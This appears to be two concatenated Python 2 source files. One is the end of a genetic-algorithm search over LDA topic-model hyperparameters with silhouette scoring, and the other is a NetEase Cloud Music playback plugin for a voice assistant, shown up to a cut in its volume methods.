    # object, and the handle is never closed — relies on GC to release it.
    f = open(foldername + f, 'r')
    txt = str(f.read())
    corpus.append(txt)
    texts.append(txt.split())
    rc += 1

dictionary = corpora.Dictionary(texts)
corpus2 = [dictionary.doc2bow(text) for text in texts]
dictionary.save(foldermodels+'MultiCore.dict')
corpora.MmCorpus.serialize(foldermodels+'MultiCoreCorpus.mm', corpus2)

# term frequency
NumApp = len(corpus)
NumFeatures = len(dictionary)
#vectorizer=CountVectorizer(stop_words='english', strip_accents='ascii', max_features=NumFeatures, dtype=np.int32)
vectorizer = CountVectorizer(max_features=NumFeatures, dtype=np.int32)
tf_array = vectorizer.fit_transform(corpus).toarray()
vocab = vectorizer.get_feature_names()

print("Starting Mutations::")
# print(corpus)
print(NumApp)
print(NumFeatures)
NumFeatures = len(vocab)
print(NumFeatures)
print(count)

# Globals recomputed on every GA fitness evaluation.
Centers = []
Clusters = []
classes = []
logfile = open(foldermodels+'/log.txt', 'w')
# Pairwise document distance matrix, used by the silhouette computation.
sqD = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(tf_array))
shScore = {}  # memo: parameter-string -> silhouette score
def CalSilhouette2(j):
    """Return a silhouette-style score for document *j*.

    Uses the globals set up by eval_func: min_b is the distance to the
    nearest *other* cluster centre, max_a the farthest same-cluster document
    (via the precomputed sqD matrix). Score is (min_b - max_a) / max of both.
    """
    min_b = 10000
    max_a = 0
    clu = classes[j]
    global sqD
    for i in xrange(len(Centers)):
        if i != clu:
            b = np.linalg.norm(Centers[i] - tf_array[j])
            if b < min_b:
                min_b = b
    for k in xrange(len(Clusters[clu])):
        a = sqD[clu2orig[clu][k], j]  # np.linalg.norm(Clusters[clu][k]-tf_array[j])
        if a > max_a:
            max_a = a
    sh = ((min_b - max_a) / max(max_a, min_b))
    if (j % 5000 == 0):
        print("Calclated Silhoute for :" + str(j) + " Documents")
    return sh
# Number of topics in the current model; set by eval_func before pool.map.
topic_num = None

def getTopicProb(j):
    """Return document *j*'s dense topic-probability vector of length topic_num.

    Expands gensim's sparse (topic_id, prob) list from the global
    docTopicProbMat into a dense list (missing topics get probability 0).
    """
    currrdocProb = [0] * topic_num
    for p in docTopicProbMat[j]:
        currrdocProb[p[0]] = p[1]
    return currrdocProb
def eval_func(NTopic):
    """GA fitness function: train an LDA model from the 4-gene chromosome and
    return a silhouette score in [0, 1].

    Genes (each in [20, 50] per the GA setup below):
      NTopic[0] -> number of topics (gene / 10, i.e. 2..5)
      NTopic[1] -> LDA iterations
      NTopic[2] -> alpha, NTopic[3] -> eta (rescaled by (g - 20) / 480)
    Mutates many module globals (classes, Centers, Clusters, clu2orig,
    docTopicProbMat, topic_num, count) used by the parallel workers.
    """
    global count
    # NTopic[0]=2
    print NTopic[0]
    # LDA
    # model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
    # model.fit(tf_array)
    # doc_topic = model.doc_topic_
    global topic_num
    numoftopics = int(NTopic[0] / 10)
    topic_num = numoftopics
    iters = NTopic[1]
    # al=float(50.00)/float(NTopic[2])
    al = (float(NTopic[2]) - 20) / 480
    bet = (float(NTopic[3]) - 20) / 480
    # NOTE(review): under Python 2, 1/480 is integer division and yields 0,
    # so these fallbacks leave alpha/eta at 0 — probably intended as 1.0/480.
    if al == 0.0:
        al = 1/480
    if bet == 0.0:
        bet = 1/480
    #al= 0
    #bet = 0
    log = str(count)+' '+str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
    print log
    logfile.write(log)
    # model=gensim.models.ldamodel.LdaModel(corpus2,num_topics=NTopic[0],id2word=dictionary,iterations=20,alpha=50.00/NTopic[0],eta=0.01)
    # model=gensim.models.ldamulticore.LdaMulticore(corpus2,num_topics=NTopic[0],id2word=dictionary,iterations=20,alpha=50.00/NTopic[0],eta=0.01)
    model = gensim.models.ldamulticore.LdaMulticore(corpus2, num_topics=numoftopics, id2word=dictionary,
                                                    iterations=iters, alpha=al, eta=bet)
    #model = gensim.models.ldamulticore.LdaMulticore(corpus2, num_topics=numoftopics, id2word=dictionary,
    #                                                iterations=iters)
    #model.save(foldermodels+str(log) + '.model')
    print("Created Model::" + str(count))
    doc_topic_list = []
    global docTopicProbMat
    docTopicProbMat = None
    docTopicProbMat = model[corpus2]
    #sequential
    '''
    for l, t in izip(docTopicProbMat, corpus):
        # print t,"#",l
        currrdocProb = []
        for p in l:
            currrdocProb.append(p[1])
            # print(p[1])
        doc_topic_list.append(currrdocProb)
    '''
    # Densify the per-document topic distributions in parallel.
    pool = multiprocessing.Pool(processes=4)
    doc_topic_list = pool.map(getTopicProb, xrange(len(docTopicProbMat)))
    doc_topic = np.array(doc_topic_list)
    print "********doc topic shape:", doc_topic.shape
    global classes
    classes = []
    # Hard-assign each document to its argmax topic.
    for i in range(NumApp):
        try:
            # print("Processing Document "+str(i)+"::"+str(corpus[i]+str(doc_topic[i])))
            classes.append(np.array(doc_topic[i]).argmax())
        except:
            print("Error for Document " + str(i) + "::" + str(corpus[i] + str(doc_topic[i])))
    classes = np.array(classes)
    # Centroid
    global Centers
    global Clusters
    Centers = []
    Clusters = []
    global clu2orig
    clu2orig = {}
    for i in range(numoftopics):
        clu2orig[i] = {}
        tmp_sum = np.zeros((1, NumFeatures))
        cnt = 0
        points = []
        # p = tf_array[classes==i]
        # points = list(p)
        # c_i = p.mean()
        for j in range(NumApp):
            if classes[j] == i:
                points.append(tf_array[j])
                tmp_sum = tmp_sum + tf_array[j]
                clu2orig[i][cnt] = j
                cnt = cnt + 1
        # NOTE(review): an empty cluster makes cnt == 0 and divides by zero.
        c_i = tmp_sum / cnt
        Centers.append(c_i)
        Clusters.append(points)
        if (len(Clusters) % 100 == 0):
            print(str(len(Clusters)) + " ::: CREATED")
    print(str(len(Clusters)) + " ::: CREATED")
    print("CALCULATING SILHOUEET COFEFFICENT")
    # Silhouette coefficient Compute In Parallel
    s_j = []
    # MULTIPROCESSING
    numofcores = multiprocessing.cpu_count()
    s_j = Parallel(n_jobs=2)(delayed(CalSilhouette2)(j) for j in range(NumApp))
    # MULTITHREADING
    '''
    for j in range(NumApp):
        t = Thread(target=CalSilhouette,args=(j,))
        t.start()
        t.join()
    '''
    '''
    #NORMAL SEQUENTIAL
    for j in range(NumApp):
        min_b=10000
        max_a=0
        clu=classes[j]
        for i in range(len(Centers)):
            if i!=clu:
                b=np.linalg.norm(Centers[i]-tf_array[j])
                if b<min_b:
                    min_b=b
        for k in range(len(Clusters[clu])):
            a=np.linalg.norm(Clusters[clu][k]-tf_array[j])
            if a>max_a:
                max_a=a
        s_j.append((min_b-max_a)/max(max_a,min_b))
        print("Cacluated Silhoute for::"+str(len(s_j))+":DOCS:")
    '''
    # Mean silhouette, shifted from [-1, 1] into [0, 1] for the GA.
    s = sum(s_j) / NumApp
    s = (s + 1) / 2
    log = "SCORE::" + str(s)
    print log
    logfile.write(log+'\n')
    count = count + 1
    print("COUNT::" + str(count))
    model.clear()
    return s
def eval_func2(NTopic):
    """Memoising wrapper around eval_func.

    Reconstructs the parameter string for the chromosome and only trains a
    new model (via eval_func) when that combination has not been scored yet;
    results are cached in the global shScore dict.
    """
    # NTopic[0]=2
    print NTopic[0]
    # LDA
    # model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
    # model.fit(tf_array)
    # doc_topic = model.doc_topic_
    numoftopics = int(NTopic[0] / 10)
    iters = NTopic[1]
    # al=float(50.00)/float(NTopic[2])
    al = (float(NTopic[2]) - 20) / 480
    bet = (float(NTopic[3]) - 20) / 480
    #al = 0
    #bet = 0
    global shScore
    log = str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
    print log
    if not log in shScore:
        shScore[log] = eval_func(NTopic)
    return shScore[log]
def eval_func_JustModel(NTopic):
    """Train and save an LDA model for the chromosome, without scoring it.

    Used after the GA finishes to persist the best individual's model.
    Note the different alpha/eta rescaling denominator (4800 vs eval_func's
    480) — presumably intentional for the final model; confirm.
    """
    global count
    # NTopic[0]=2
    print NTopic[0]
    # LDA
    # model = lda.LDA(n_topics=NTopic[0], n_iter=20,alpha=50.00/NTopic[0],eta=0.01,random_state=12)
    # model.fit(tf_array)
    # doc_topic = model.doc_topic_
    global topic_num
    numoftopics = int(NTopic[0] / 10)
    topic_num = numoftopics
    iters = NTopic[1]
    # al=float(50.00)/float(NTopic[2])
    al = (float(NTopic[2]) - 20) / 4800
    bet = (float(NTopic[3]) - 20) / 4800
    log = str(count)+' '+str(numoftopics) + ' ' + str(iters) + ' ' + str(al) + ' ' + str(bet) + "\n"
    print log
    logfile.write(log)
    print("Creating Model::" + str(count))
    model = gensim.models.ldamulticore.LdaMulticore(corpus2, passes=20, num_topics=numoftopics, id2word=dictionary, iterations=iters, alpha=al, eta=bet)
    model.save(foldermodels+str(numoftopics) +'_'+str(iters) + '.model')
    #model= gensim.models.ldamodel.LdaModel.load(foldermodels + '44_171.model')
    # NOTE(review): dead assignment — the list is never used after this point.
    doc_topic_list = []
# GA driver: evolve the 4-gene chromosome (topics, iterations, alpha, eta)
# with pyevolve, then persist and export the best model's topic assignments.
genome = G1DList.G1DList(4)
genome.evaluator.set(eval_func2)
genome.setParams(rangemin=20, rangemax=50)
genome.crossover.set(Crossovers.G1DListCrossoverUniform)
ga = GSimpleGA.GSimpleGA(genome)
ga.setPopulationSize(10)
ga.setGenerations(10)
ga.evolve(freq_stats=1)
print ga.bestIndividual()
# print(corpus)
print(NumApp)
#print(NumFeatures)
print(count)
fo = open(foldermodels+"bestindividual", "a")
# Retrain (with passes=20) and save the winning parameter combination.
eval_func_JustModel(ga.bestIndividual().genomeList)
fo.write(str(ga.bestIndividual()))
logfile.write(str(ga.bestIndividual())+'\n')
fo.close()
logfile.close()

try:
    #foldermain = wd + '/Experiments/'
    # folderpath='../EXPERIMENTS/MODELS/'
    folderpath = foldermain + '/MODELS/'
    dictionary = gensim.corpora.Dictionary.load(folderpath + 'MultiCore.dict')
    corpus = gensim.corpora.MmCorpus(folderpath + 'MultiCoreCorpus.mm')
    modelfile = ''
    # for f in os.listdir(folderpath):
    #     if ('.model' in f and '.model.state' not in f):
    #         modelfile = f
    # Pick the saved .model file, skipping gensim's auxiliary state files.
    for f in os.listdir(folderpath):
        if ('.model' in f):
            filetype = f.split('.')[-1]
            if filetype not in ['state', 'id2word', 'npy']:
                modelfile = f
    print(modelfile)
    model_test = gensim.models.ldamodel.LdaModel.load(folderpath + modelfile)
    #
    # In[5]:
    # show word probabilities for each topic
    X = model_test.show_topics(num_topics=50, num_words=5, log=False, formatted=False)
    test = [(x[0], [y[0] for y in x[1]]) for x in X]
    topicDesc = {}
    for t in test:
        topicstr = ' + '.join(str(e) for e in t[1])
        # print topicstr
        topicDesc[t[0]] = topicstr
    model_test.show_topics(num_topics=50, num_words=5, log=False, formatted=False)
    # In[6]:
    # WRITETOFILE
    folder = foldermain + '/REPOPROPS/'
    # NOTE(review): opening/closing the file once per key would be cheaper,
    # but append mode keeps this correct as written.
    for k in topicDesc.keys():
        line = str(k) + ',' + topicDesc[k]
        fout = open(folder + 'topickeys.csv', 'a')
        fout.write(line + '\n')
        fout.close()
    # In[7]:
    # LOAD DOCUMENTS
    import os
    foldername = foldermain + '/FILTEREDRM/PREPROCESSED/'
    fileList = os.listdir(foldername)
    docdict = {}
    for fn in fileList:
        f = open(foldername + fn, 'r')
        txt = str(f.read())
        docdict[fn] = txt.split()
        f.close()
    # In[8]:
    # FIND TOPIC
    import numpy as np
    docTopicDict = {}
    for d in docdict.keys():
        docProbs = model_test[[dictionary.doc2bow(docdict[d])]]
        currrdocProb = [0] * 49
        for p in docProbs[0]:
            currrdocProb[p[0]] = p[1]
        doc_topic = np.array(currrdocProb)
        topic = np.array(doc_topic).argmax()
        docTopicDict[d.strip().replace('.txt', '')] = topic
    # In[9]:
    # WRITE DOCTOPIC TO FILES
    folder = foldermain + '/REPOPROPS/'
    for k in docTopicDict:
        line = k + ',' + str(docTopicDict[k])
        fout = open(folder + 'doctopic.csv', 'a')
        fout.write(line + '\n')
        fout.close()
    # In[10]:
    # LOAD DOC/proj/repo NAMEs
    #repdata = os.listdir(foldermain + '/HTMLSORG')
    repdata = os.listdir(foldermain+'/FILTEREDRM/PREPROCESSED/')
    # In[11]:
    # COMBINE DATA
    fnames = docTopicDict.keys()
    cnt = 0
    folder = foldermain + '/REPOPROPS/'
    comb = open(folder + 'comb2desc.csv', 'a')
    for repoline in repdata:
        # fkey=repoline.split(',')[0]
        fkey = repoline.replace('.txt', '')
        if (fkey in fnames):
            currtopic = docTopicDict[fkey]
            newline = repoline.replace('\n', '') + ',' + str(currtopic) + ',' + str(topicDesc[currtopic])
        else:
            newline = repoline.replace('\n', '') + ',TOPICASSIGNED,TOPICWORDS'
        comb.write(newline + '\n')
    comb.close()
except:
    # NOTE(review): bare except hides the actual failure; at minimum log it.
    print("Error Occured whil combining topics with documents")
|
NetEaseMusic.py | # -*- coding: utf-8-*-
# 网易云音乐播放插件
import logging
import threading
import hashlib
import time
import subprocess
import sys
import os
import re
import random
from MusicBoxApi import api as NetEaseApi
import eyed3
reload(sys)
sys.setdefaultencoding('utf8')
# Standard module stuff
WORDS = ["YINYUE"]
SLUG = "netease_music"
def handle(text, mic, profile, wxbot=None):
    """
    Responds to user-input, typically speech text

    Arguments:
    text -- user-input, typically transcribed speech
    mic -- used to interact with the user (for both input and output)
    profile -- contains information related to the user (e.g., phone
               number)
    wxbot -- wechat bot instance
    """
    logger = logging.getLogger(__name__)
    kwargs = {}
    kwargs['mic'] = mic
    kwargs['profile'] = profile
    logger.debug("Preparing to start netease music module")
    try:
        netease_wrapper = NetEaseWrapper(**kwargs)
    except Exception, e:  # Python 2 exception syntax
        logger.debug(e)
        logger.error("Couldn't connect to NetEase server", exc_info=True)
        mic.say(u"访问网易云音乐失败了,请稍后再试", cache=True)
        return
    # Wake word / persona name configured in the profile.
    persona = 'DINGDANG'
    if 'robot_name' in profile:
        persona = profile['robot_name']
    robot_name_cn = u'叮当'
    if 'robot_name_cn' in profile:
        robot_name_cn = profile['robot_name_cn']
    logger.debug("Starting music mode")
    music_mode = MusicMode(persona, robot_name_cn, mic, netease_wrapper, wxbot)
    music_mode.stop = False
    # Log in to NetEase Cloud Music using profile credentials.
    account = ''
    password = ''
    report = False
    local_default = False
    if SLUG in profile:
        if 'account' in profile[SLUG]:
            account = profile[SLUG]['account']
        if 'password' in profile[SLUG]:
            password = profile[SLUG]['password']
        if 'report' in profile[SLUG]:
            report = profile[SLUG]['report']
        if 'local_default' in profile[SLUG]:
            local_default = profile[SLUG]['local_default']
    if account == '' or password == '':
        mic.say("请先配置好账户信息再找我播放音乐", cache=True)
        return
    # Reuse a cached login ($HOME/userInfo) when one exists.
    has_login = False
    home_dir = os.path.expandvars('$HOME')
    user_info = os.path.join(home_dir, 'userInfo')
    if not (os.path.exists(user_info)):
        mic.say("稍等,正在为您登录网易云音乐", cache=True)
        res = music_mode.login(account, password, report)
        if res:
            mic.say("登录成功", cache=True)
            has_login = True
    else:
        music_mode.read_login_info(user_info, report)
        has_login = True
    if not has_login:
        mic.say("登录失败, 退出播放. 请检查配置, 稍后再试", cache=True)
        return
    if wxbot is not None:
        wxbot.music_mode = music_mode
    # Route "我想听/来一首 <song>" ("I want to hear ...") to a direct search.
    pattern = re.compile(ur'(我想听|来一首)([,]?)([\u4e00-\u9fa5]*)')
    text_utf8 = text.decode('utf-8')
    if pattern.match(text_utf8) and text != u'播放音乐':
        m = pattern.search(text_utf8)
        song_name = m.group(3)
        if song_name != '':
            music_mode.handleForever(
                play_type=2, song_name=song_name)  # 2: play the named song
    elif any(word in text for word in [u"歌单", u"我的"]):
        music_mode.handleForever(play_type=1)  # 1: user playlist
    else:
        # Default to local music when configured, otherwise the top chart.
        if local_default:
            music_mode.handleForever(play_type=3)  # 3: local music
        else:
            music_mode.handleForever(play_type=0)  # 0: recommended chart
    logger.debug("Exiting music mode")
    return
def isValid(text):
    """
    Returns True if the input is related to music.

    Arguments:
    text -- user-input, typically transcribed speech
    """
    keywords = [u"听歌", u"音乐", u"播放",
                u"我想听", u"唱歌", u"唱首歌",
                u"歌单", u"榜单"]
    for word in keywords:
        if word in text:
            return True
    return False
# The interesting part
class MusicMode(object):
    """Voice-interactive music session driving a NetEaseWrapper player.

    Listens for the wake word while music plays, interprets spoken (or
    WeChat-relayed) commands, and drives the wrapped player accordingly.
    """

    def __init__(self, PERSONA, robot_name_cn, mic,
                 netease_wrapper, wxbot=None):
        self._logger = logging.getLogger(__name__)
        self.persona = PERSONA              # wake word / persona name
        self.robot_name_cn = robot_name_cn  # robot's Chinese display name
        self.music = netease_wrapper
        self.mic = mic
        self.wxbot = wxbot
        self.search_mode = False  # True while waiting for a WeChat search keyword
        self.to_listen = True     # voice interaction enabled
        self.to_report = False    # announce each track before playing
        self.delegating = False   # True while a command is being handled
        if self.wxbot is not None:
            self.msg_thread = threading.Thread(target=self.wxbot.proc_msg)

    def read_login_info(self, user_info, report=False):
        """Restore a cached NetEase login from the *user_info* file."""
        self.to_report = report
        self.music.read_login_info(user_info)

    def login(self, account, password, report=False):
        """Log in to NetEase; returns True on success."""
        self.to_report = report
        return self.music.login(account, password)

    def delegateInput(self, input, call_by_wechat=False):
        """Dispatch one spoken/WeChat command to the matching player action."""
        command = input.upper()
        # Ignore echoes of the robot's own messages.
        if command.startswith(self.robot_name_cn + ": "):
            return
        if call_by_wechat:
            self._logger.debug('called by wechat')
            self.music.stop()
            time.sleep(.1)
        # check if input is meant to start the music module
        if u"榜单" in command:
            # Play the top chart.
            self.mic.say(u"播放榜单音乐", cache=True)
            self.music.update_playlist_by_type(0)
            self.music.play(self.to_report)
            return
        elif u"歌单" in command:
            # Play the user's own playlist.
            self.music.update_playlist_by_type(1)
            self.music.play(self.to_report)
            return
        elif any(ext in command for ext in [u"停止聆听", u"关闭聆听", u"别听我的"]):
            # Disable voice interaction (needs WeChat as a fallback channel).
            if self.wxbot is None or not self.wxbot.is_login:
                self.mic.say(u"您还未登录微信,不能关闭语音交互功能", cache=True)
                return
            self.mic.say(u"关闭语音交互功能", cache=True)
            self.to_listen = False
            self.music.play(False)
            return
        elif any(ext in command for ext in [
                u"恢复聆听", u"开始聆听", u"开启聆听", u"听我的"]):
            # Re-enable voice interaction.
            self.mic.say(u"开启语音交互功能", cache=True)
            self.to_listen = True
            self.music.play(False)
            return
        elif u"暂停" in command:
            # Pause playback.
            self.mic.say(u"暂停播放", cache=True)
            self.music.pause()
            return
        elif any(ext in command for ext in [u"结束", u"退出", u"停止"]):
            # Quit music mode entirely.
            self.music.exit()
            self.mic.say(u"结束播放", cache=True)
            if self.wxbot is not None:
                self.wxbot.music_mode = None
            return
        elif any(ext in command for ext in [u"大声", u"大声点", u"大点声"]):
            # Volume up.
            self.mic.say(u"大点声", cache=True)
            self.music.increase_volume()
            return
        elif any(ext in command for ext in [u"小声", u"小点声", u"小声点"]):
            # Volume down.
            self.mic.say(u"小点声", cache=True)
            self.music.decrease_volume()
            return
        elif any(
                ext in command for ext in [
                    u'下一首', u"下首歌", u"切歌",
                    u"下一首歌", u"换首歌", u"切割",
                    u"那首歌"]):
            # Next track.
            self.mic.say(u"下一首歌", cache=True)
            self.music.next()
            return
        elif any(ext in command for ext in [u'上一首', u'上一首歌', u'上首歌']):
            # Previous track.
            self.mic.say(u"上一首歌", cache=True)
            self.music.previous()
            return
        elif any(ext in command for ext in [u'搜索', u'查找']):
            # Search: via a WeChat reply or a follow-up voice prompt.
            if call_by_wechat:
                self.search_mode = True
                self.mic.say(u"请直接回复要搜索的关键词", cache=True)
                return
            else:
                self.mic.say(u"请在滴一声后告诉我您要搜索的关键词", cache=True)
                input = self.mic.activeListen(MUSIC=True)
                if input is None or input.strip() == '':
                    self.mic.say("没有听到关键词呢,请重新叫我查找吧", cache=True)
                    self.music.play(False)
                    return
                self.mic.say(u'正在为您搜索%s' % input)
                self.music.update_playlist_by_type(2, input)
                self.music.play(self.to_report)
                return
        elif u'什么歌' in command:
            # Announce the current track.
            self.mic.say(u"正在播放的是%s的%s" % (
                self.music.song['artist'],
                self.music.song['song_name']))
            self.music.play(False)
            return
        elif u'随机' in command:
            # Shuffle mode.
            self.mic.say(u"随机播放", cache=True)
            self.music.randomize()
            return
        elif u'顺序' in command:
            # Sequential mode.
            self.mic.say(u"顺序播放", cache=True)
            self.music.serialize()
            return
        elif any(ext in command for ext in [u"播放", u"继续", u"我想听", u"来一首"]):
            # Play/resume, optionally with a named song extracted from the text.
            pattern = re.compile(ur'(播放|我想听|来一首)([,]?)([\u4e00-\u9fa5]+)')
            text_utf8 = command.decode('utf-8')
            song_name = ''
            if pattern.match(text_utf8):
                m = pattern.search(text_utf8)
                song_name = m.group(3)
            if song_name != '':
                self.music.update_playlist_by_type(2, song_name)
            elif u'即将播放' not in command:
                self.music.play(self.to_report)
            return
        elif self.search_mode:
            # This input is the keyword the previous search command asked for.
            self.search_mode = False
            input = command
            if input is None or input.strip() == '':
                self.mic.say("没有听到关键词呢,请重新叫我查找吧", cache=True)
                self.music.play(False)
                return
            self.mic.say(u'正在为您搜索%s' % input)
            self.music.update_playlist_by_type(2, input)
            self.music.play(self.to_report)
        else:
            self.mic.say(u"没有听懂呢。要退出播放,请说退出播放", cache=True)
            self.music.play(False)
            return
        return

    def handleForever(self, play_type=0, song_name=''):
        """
        Run the music-playing loop until the user quits.

        play_type -- 0: recommended chart; 1: user playlist;
                     2: play the named song_name; 3: local music
        """
        if song_name != '':
            self.music.update_playlist_by_type(2, song_name)
        else:
            self.music.update_playlist_by_type(play_type)
        self.music.start()  # start the NetEaseWrapper playback thread
        if self.wxbot is not None:
            self.msg_thread.start()
        while True:
            if self.music.is_stop:
                self._logger.info('Stop Netease music mode')
                return
            if not self.to_listen or self.delegating:
                # NOTE(review): busy-wait — spins at full speed while voice
                # interaction is off; a short sleep would reduce CPU use.
                self._logger.info("Listening mode is disabled.")
                continue
            try:
                self._logger.info('离线唤醒监听中')
                threshold, transcribed = self.mic.passiveListen(self.persona)
            except Exception, e:  # Python 2 exception syntax
                self._logger.debug(e)
                threshold, transcribed = (None, None)
            if not transcribed or not threshold:
                self._logger.info("Nothing has been said or transcribed.")
                continue
            # Wake word heard: stop playback.
            self.music.stop()
            time.sleep(.1)
            # Listen for the user's command.
            input = self.mic.activeListen(MUSIC=True)
            if input:
                if any(ext in input for ext in [u"结束", u"退出", u"停止"]):
                    self.mic.say(u"结束播放", cache=True)
                    self.music.stop()
                    self.music.exit()
                    return
                if not self.delegating:
                    self.delegating = True
                    self.delegateInput(input)
                    self.delegating = False
            else:
                self.mic.say(u"什么?", cache=True)
                if not self.music.is_pause:
                    self.music.play(False)
class NetEaseWrapper(threading.Thread):
    """Playback thread wrapping the MusicBoxApi NetEase client.

    Plays each track by spawning the SoX `play` command in a subprocess and
    coordinates track switching through a threading.Condition.
    """

    def __init__(self, mic, profile):
        super(NetEaseWrapper, self).__init__()
        self.cond = threading.Condition()
        self.netease = NetEaseApi.NetEase()
        self.mic = mic
        self.profile = profile
        self.userId = ""
        self.volume = 0.7    # `play -v` volume factor, clamped to [0, 1]
        self.song = None     # info dict of the track currently playing
        self.idx = -1        # index of the current track (-1 = not started)
        self.random = False  # shuffle mode
        self.playlist = []
        self.is_pause = False
        self.is_stop = False

    def set_cond(self, cond):
        """Replace the condition variable used for playback coordination."""
        self.cond = cond

    def update_playlist_by_type(self, play_type, keyword=''):
        """Load a new playlist.

        play_type -- 0: top chart; 1: first user playlist; 2: search by
                     *keyword*; 3: local mp3 files
        """
        if play_type == 0:
            # Popular chart.
            self.playlist = self.get_top_songlist()
        elif play_type == 1:
            # User playlist.  BUG FIX: the original tested
            # `user_playlist > 0`, comparing the list itself with an int —
            # always true under Python 2, so an empty playlist crashed on
            # `user_playlist[0]`.  Test for emptiness instead.
            user_playlist = self.get_user_playlist()
            if user_playlist:
                self.playlist = self.get_song_list_by_playlist_id(
                    user_playlist[0]['id'])
                if len(self.playlist) == 0:
                    self.mic.say("用户歌单没有歌曲,改为播放推荐榜单", cache=True)
                    self.playlist = self.get_top_songlist()
            else:
                self.mic.say("当前用户没有歌单,改为播放推荐榜单", cache=True)
                self.playlist = self.get_top_songlist()
        elif play_type == 2:
            # Song search.
            self.playlist = self.search_by_name(keyword)
        elif play_type == 3:
            self.playlist = self.get_local_songlist()

    def get_local_songlist(self):
        """Scan the configured local directory (top level only) for mp3s."""
        local_path = ''
        if 'local_path' in self.profile[SLUG]:
            local_path = self.profile[SLUG]['local_path']
        playlist = []
        for (dirpath, dirnames, filenames) in os.walk(local_path):
            for filename in filenames:
                # Only accept mp3 files.
                if os.path.splitext(filename)[1] != ".mp3":
                    continue
                # BUG FIX: join with the path separator; plain concatenation
                # produced paths like "/music<file>.mp3" when local_path had
                # no trailing slash.
                mp3_path = os.path.join(dirpath, filename)
                audiofile = eyed3.load(mp3_path)
                music_info = {}
                music_info.setdefault("song_id", audiofile.tag.track_num[0])
                music_info.setdefault("song_name", audiofile.tag.title)
                music_info.setdefault("artist", audiofile.tag.artist)
                music_info.setdefault("album_name", audiofile.tag.album)
                # Quoted so the shell `play` command survives spaces.
                music_info.setdefault("mp3_url", "'{}'".format(mp3_path))
                music_info.setdefault("playTime", int(
                    audiofile.info.time_secs) * 1000)
                music_info.setdefault("quality", "")
                playlist.append(music_info)
            break  # do not recurse into subdirectories
        return playlist

    def get_top_songlist(self):
        """Fetch the popular-singles chart as a list of track-info dicts."""
        music_list = self.netease.top_songlist()
        datalist = self.netease.dig_info(music_list, 'songs')
        playlist = []
        for data in datalist:
            music_info = {}
            music_info.setdefault("song_id", data.get("song_id"))
            music_info.setdefault("song_name", data.get("song_name"))
            music_info.setdefault("artist", data.get("artist"))
            music_info.setdefault("album_name", data.get("album_name"))
            music_info.setdefault("mp3_url", data.get("mp3_url"))
            music_info.setdefault("playTime", data.get("playTime"))
            music_info.setdefault("quality", data.get("quality"))
            playlist.append(music_info)
        return playlist

    def read_login_info(self, user_info):
        """Load the cached user id from the *user_info* file."""
        assert(os.path.exists(user_info))
        with open(user_info) as f:
            self.userId = f.readline()

    def login(self, username, password):
        """Log in; on success cache the user id in $HOME/userInfo."""
        password = hashlib.md5(password).hexdigest()  # NOTE: Py2 str input
        login_info = self.netease.login(username, password)
        if login_info['code'] == 200:
            res = True
            userId = login_info.get('profile').get('userId')
            self.userId = userId
            home_dir = os.path.expandvars('$HOME')
            user_info = os.path.join(home_dir, 'userInfo')
            # `with` guarantees the cache file is closed even on error.
            with open(user_info, 'w') as f:
                f.write(str(userId))
        else:
            res = False
        return res

    def get_user_playlist(self):
        """Return the logged-in user's playlists."""
        play_list = self.netease.user_playlist(self.userId)
        return play_list

    def get_song_list_by_playlist_id(self, playlist_id):
        """Return the tracks contained in playlist *playlist_id*."""
        songs = self.netease.playlist_detail(playlist_id)
        song_list = self.netease.dig_info(songs, 'songs')
        return song_list

    def search_by_name(self, song_name):
        """Search NetEase for *song_name* and return matching tracks."""
        data = self.netease.search(song_name)
        song_ids = []
        if 'songs' in data['result']:
            if 'mp3Url' in data['result']['songs']:
                songs = data['result']['songs']
            else:
                # Results lack URLs: re-fetch full details by id.
                for i in range(0, len(data['result']['songs'])):
                    song_ids.append(data['result']['songs'][i]['id'])
                songs = self.netease.songs_detail(song_ids)
        song_list = self.netease.dig_info(songs, 'songs')
        return song_list

    def current_song(self):
        """Return the name of the currently playing song ('' if none)."""
        if self.song is not None:
            return self.song['song_name']
        else:
            return ''

    def run(self):
        """Thread body: keep playing, advancing after each track."""
        while True:
            if self.cond.acquire():
                # NOTE(review): the lock is acquired each loop and never
                # explicitly released here; cond.wait() inside play()
                # releases it while blocked.
                self.play()
                self.pick_next()

    def play(self, report=False):
        """Play the current (or a random) track, blocking on the condition.

        report -- announce artist/title before starting playback.
        """
        if self.is_pause:
            self.is_pause = False
        if self.idx < len(self.playlist):
            if self.idx == -1:
                self.idx = 0
            if not self.random:
                song = self.playlist[self.idx]
            else:
                song = random.choice(self.playlist)
            self.song = song
            subprocess.Popen("pkill play", shell=True)  # kill previous player
            # Refresh the (short-lived) mp3 URL just before playing.
            song['mp3_url'] = self.netease.songs_detail_new_api(
                [song['song_id']])[0]['url']
            mp3_url = song['mp3_url']
            if mp3_url is None:
                self.next()
                self.cond.wait()
            try:
                if report:
                    self.mic.say(u"即将播放:%s,%s" % (
                        song['artist'], song['song_name']))
                time.sleep(.1)
                # NOTE(review): shell string interpolation; mp3_url comes
                # from the NetEase API and is not escaped.
                subprocess.Popen("play -v %f %s" % (
                    self.volume, mp3_url), shell=True, stdout=subprocess.PIPE)
                self.cond.notify()
                # Wait for the track duration (ms -> s) or an interruption.
                self.cond.wait(int(song.get('playTime')) / 1000)
            except Exception:
                pass
        else:
            # Index ran past the playlist: stop the player and wait.
            try:
                subprocess.Popen("pkill play", shell=True)
                self.cond.notify()
                self.cond.wait()
            except Exception:
                pass

    def notify(self):
        """Wake up any thread blocked on the playback condition."""
        if self.cond.acquire():
            self.cond.notifyAll()
            self.cond.release()

    def previous(self):
        """Step back one track (run() will advance by one afterwards)."""
        self.idx -= 2
        if self.idx < 0:
            self.idx = len(self.playlist) - 1
        self.notify()

    def pick_next(self):
        """Advance the track index, wrapping at the end of the playlist."""
        self.idx += 1
        if self.idx > len(self.playlist) - 1:
            self.idx = 0

    def next(self):
        """Skip to the next track by interrupting the current wait."""
        self.notify()

    def randomize(self):
        """Enable shuffle mode and skip ahead."""
        self.random = True
        self.next()

    def serialize(self):
        """Return to sequential playback."""
        self.random = False
        self.notify()

    def increase_volume(self):
